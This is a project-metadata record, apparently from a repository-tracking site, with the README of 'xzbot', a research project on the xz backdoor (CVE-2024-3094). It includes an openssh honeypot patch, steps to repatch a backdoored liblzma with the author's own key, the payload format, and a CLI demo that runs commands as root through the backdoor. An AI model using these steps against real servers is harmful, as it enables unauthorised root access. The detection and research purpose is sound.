[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-73238":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":16,"subscribersCount":16,"size":16,"stars1d":16,"stars7d":16,"stars30d":17,"stars90d":16,"forks30d":16,"starsTrendScore":16,"compositeScore":18,"rankGlobal":10,"rankLanguage":10,"license":10,"archived":19,"fork":19,"defaultBranch":20,"hasWiki":19,"hasPages":19,"topics":21,"createdAt":10,"pushedAt":10,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":16,"starSnapshotCount":16,"syncStatus":17,"lastSyncTime":25,"discoverSource":26},73238,"xzbot","amlweems\u002Fxzbot","amlweems","notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)","",null,"Go",3557,235,34,1,0,2,56.32,false,"main",[],"2026-06-12 04:01:08","# xzbot\n\nExploration of the xz [backdoor](https:\u002F\u002Fwww.openwall.com\u002Flists\u002Foss-security\u002F2024\u002F03\u002F29\u002F4) (CVE-2024-3094).\nIncludes the following:\n* [honeypot](#honeypot): fake vulnerable server to detect exploit attempts\n* [ed448 patch](#ed448-patch): patch liblzma.so to use our own ED448 public key\n* [backdoor format](#backdoor-format): format of the backdoor payload\n* [backdoor demo](#backdoor-demo): cli to trigger the RCE assuming knowledge of the ED448 private key\n\n![xzbot demo](assets\u002Fdemo.png)\n\n## honeypot\n\nSee [openssh.patch](openssh.patch) for a simple patch to openssh that logs any\nconnection attempt with a public key N matching the backdoor format.\n\n```\n$ git clone https:\u002F\u002Fgithub.com\u002Fopenssh\u002Fopenssh-portable\n$ patch -p1 \u003C ~\u002Fpath\u002Fto\u002Fopenssh.patch\n$ autoreconf\n$ .\u002Fconfigure\n$ make\n```\n\nAny connection attempt will appear as follows in sshd logs:\n```\n$ journalctl -u ssh-xzbot --since='1d ago' | grep xzbot:\nMar 30 00:00:00 honeypot sshd-xzbot[1234]: xzbot: magic 1 [preauth]\nMar 30 00:00:00 honeypot sshd-xzbot[1234]: xzbot: 010000000100000000000000000000005725B22ED2...\n```\n\n# ed448 patch\n\nThe backdoor uses a hardcoded ED448 public key for signature validation and\ndecrypting the payload. If we replace this key with our own, we can trigger\nthe backdoor.\n\nThe attacker's ED448 key is:\n```\n0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28\n34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48\n10 0c b0 6c 3a be 14 ee 89 55 d2 45 00 c7 7f 6e\n20 d3 2c 60 2b 2c 6d 31 00\n```\n\nWe will replace this key with our own (generated with seed=0):\n```\n5b 3a fe 03 87 8a 49 b2 82 32 d4 f1 a4 42 ae bd\ne1 09 f8 07 ac ef 7d fd 9a 7f 65 b9 62 fe 52 d6\n54 73 12 ca ce cf f0 43 37 50 8f 9d 25 29 a8 f1\n66 91 69 b2 1c 32 c4 80 00\n```\n\nTo start, download a backdoored libxzma shared object, e.g.\nfrom https:\u002F\u002Fsnapshot.debian.org\u002Fpackage\u002Fxz-utils\u002F5.6.1-1.\nThen run the patch script. See [assets\u002F](assets\u002F) for examples.\n\n```\n$ pip install pwntools\n$ shasum -a 256 liblzma.so.5.6.1\n605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4 liblzma.so.5.6.1\n$ python3 patch.py liblzma.so.5.6.1\nPatching func at offset: 0x24470\nGenerated patched so: liblzma.so.5.6.1.patch\n```\n\nThen run sshd using this modified `liblzma.so.5.6.1.patch` shared object.\n\n## backdoor format\n\nThe backdoor can be triggered by connecting with an SSH certificate with a\npayload in the CA signing key N value. This payload must be encrypted and\nsigned with the attacker's ED448 key.\n\nThe structure has the following format:\n```\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n| a (32 bit) | b (32 bit) | c (64 bit) |\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n| |\n+ ciphertext (240 bytes) +\n| |\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n```\n\nA request type is derived from the three values above (`a * b + c`).\nIf this value is greater than 3, the backdoor skips processing.\n\n* Type 1: unknown, expects zero bytes\n* Type 2: executes null-terminated payload with system()\n* Type 3: unknown, expects 48 bytes (signed)\n\nThe ciphertext is encrypted with chacha20 using the first 32 bytes of the\nED448 public key as a symmetric key. As a result, we can decrypt any\nexploit attempt using the following key:\n```\n0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28\n34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48\n```\n\nThe ciphertext has the following format:\n```\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n| signature (114 bytes) |\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n| x (1 bit) | unused ? (14 bit) | y (1 bit) |\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n| unknown (8 bit) | length (8 bit) |\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n| unknown (8 bit) | command \\x00 |\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n```\n\nSetting either `x` or `y` leads to slightly different code paths.\n\nThe signature is an RFC-8032 ED448 signature computed over the following values:\n* The 32-bit magic value (e.g. `02 00 00 00`)\n* The 5 bytes of fields before command\n* [optional] `length` bytes of the command\n* The first 32 bytes of the sha256 hash of the server's hostkey\n\n# backdoor demo\n\n```\n$ go install github.com\u002Famlweems\u002Fxzbot@latest\n```\n\n```\n$ xzbot -h\nUsage of xzbot:\n -addr string\n ssh server address (default \"127.0.0.1:2222\")\n -seed string\n ed448 seed, must match xz backdoor key (default \"0\")\n -cmd string\n command to run via system() (default \"id > \u002Ftmp\u002F.xz\")\n```\n\nThe following will connect to a vulnerable SSH server at `127.0.0.1:2222` and\nrun the command `id > \u002Ftmp\u002F.xz`:\n```\n$ xzbot -addr 127.0.0.1:2222 -cmd 'id > \u002Ftmp\u002F.xz'\n00000000 00 00 00 1c 73 73 68 2d 72 73 61 2d 63 65 72 74 |....ssh-rsa-cert|\n00000010 2d 76 30 31 40 6f 70 65 6e 73 73 68 2e 63 6f 6d |-v01@openssh.com|\n00000020 00 00 00 00 00 00 00 03 01 00 01 00 00 01 01 01 |................|\n00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\n...\n00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\n00000160 00 00 01 14 00 00 00 07 73 73 68 2d 72 73 61 00 |........ssh-rsa.|\n00000170 00 00 01 01 00 00 01 00 02 00 00 00 01 00 00 00 |................|\n00000180 00 00 00 00 00 00 00 00 54 97 bc c5 ef 93 e4 24 |........T......$|\n00000190 cf b1 57 57 59 85 52 fd 41 2a a5 54 9e aa c6 52 |..WWY.R.A*.T...R|\n000001a0 58 64 a4 17 45 8a af 76 ce d2 e3 0b 7c bb 1f 29 |Xd..E..v....|..)|\n000001b0 2b f0 38 45 3f 5e 00 f1 b0 00 15 84 e7 bc 10 1f |+.8E?^..........|\n000001c0 0f 5f 50 36 07 9f bd 07 05 77 5c 74 84 69 c9 7a |._P6.....w\\t.i.z|\n000001d0 28 6b e8 16 aa 99 34 bf 9d c4 c4 5c b8 fd 4a 3c |(k....4....\\..J\u003C|\n000001e0 d8 2b 39 32 06 d9 4f a4 3a 00 d0 0b 0f a2 21 c0 |.+92..O.:.....!.|\n000001f0 86 c3 c9 e2 e6 17 b4 a6 54 ba c3 a1 4c 40 91 be |........T...L@..|\n00000200 91 9a 2b f8 0b 18 61 1c 5e e1 e0 5b e8 00 00 00 |..+...a.^..[....|\n00000210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\n...\n00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\n00000270 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 07 |................|\n00000280 73 73 68 2d 72 73 61 00 00 00 01 00 |ssh-rsa.....|\n2024\u002F03\u002F30 00:00:00 ssh: handshake failed: EOF\n```\n\nOn the vulnerable server, we can set a watchpoint for the call to `system()`\nand observe the command is executed:\n```\n$ bpftrace -e 'watchpoint:0x07FFFF74B1995:8:x {\n printf(\"%s (%d): %s\\n\", comm, pid, str(uptr(reg(\"di\"))))\n}'\nAttaching 1 probe...\nsshd (1234): id > \u002Ftmp\u002F.xz\n\n$ cat \u002Ftmp\u002F.xz\nuid=0(root) gid=0(root) groups=0(root)\n```\n\nThe process tree after exploitation looks different from a normal sshd\nprocess tree:\n```\n# normal process tree\n$ ssh foo@bar\n$ ps -ef --forest\nroot 765 1 0 17:58 ? 00:00:00 sshd: \u002Fusr\u002Fsbin\u002Fsshd -D [listener] 0 of 10-100 startups\nroot 1026 765 7 18:51 ? 00:00:00 \\_ sshd: foo [priv]\nfoo 1050 1026 0 18:51 ? 00:00:00 \\_ sshd: foo@pts\u002F1\nfoo 1051 1050 0 18:51 pts\u002F1 00:00:00 \\_ -bash\n\n# backdoor process tree\n$ xzbot -cmd 'sleep 60'\n$ ps -ef --forest\nroot 765 1 0 17:58 ? 00:00:00 sshd: \u002Fusr\u002Fsbin\u002Fsshd -D [listener] 0 of 10-100 startups\nroot 941 765 4 18:04 ? 00:00:00 \\_ sshd: root [priv]\nsshd 942 941 0 18:04 ? 00:00:00 \\_ sshd: root [net]\nroot 943 941 0 18:04 ? 00:00:00 \\_ sh -c sleep 60\nroot 944 943 0 18:04 ? 00:00:00 \\_ sleep 60\n```\n\n*Note: successful exploitation does not generate any INFO or higher log entries.*\n\n# References\n\n- https:\u002F\u002Fwww.openwall.com\u002Flists\u002Foss-security\u002F2024\u002F03\u002F29\u002F4\n- https:\u002F\u002Fgist.github.com\u002Fsmx-smx\u002Fa6112d54777845d389bd7126d6e9f504\n- https:\u002F\u002Fgist.github.com\u002Fq3k\u002Faf3d93b6a1f399de28fe194add452d01\n- https:\u002F\u002Fgist.github.com\u002Fkeeganryan\u002Fa6c22e1045e67c17e88a606dfdf95ae4\n","该项目是对xz后门(CVE-2024-3094)的探索,提供了一个虚假的易受攻击服务器用于检测攻击尝试、一个用于替换ED448公钥的补丁程序以及后门载荷格式和触发远程代码执行的演示。核心功能包括通过修改liblzma库来使用自定义的ED448密钥,并记录任何符合后门格式的连接尝试。技术上采用了Go语言开发,并且需要一些额外工具如pwntools的支持。适用于网络安全研究人员或红队成员在测试环境中模拟特定漏洞利用场景,以增强系统安全性。","2026-06-11 03:44:38","high_star"]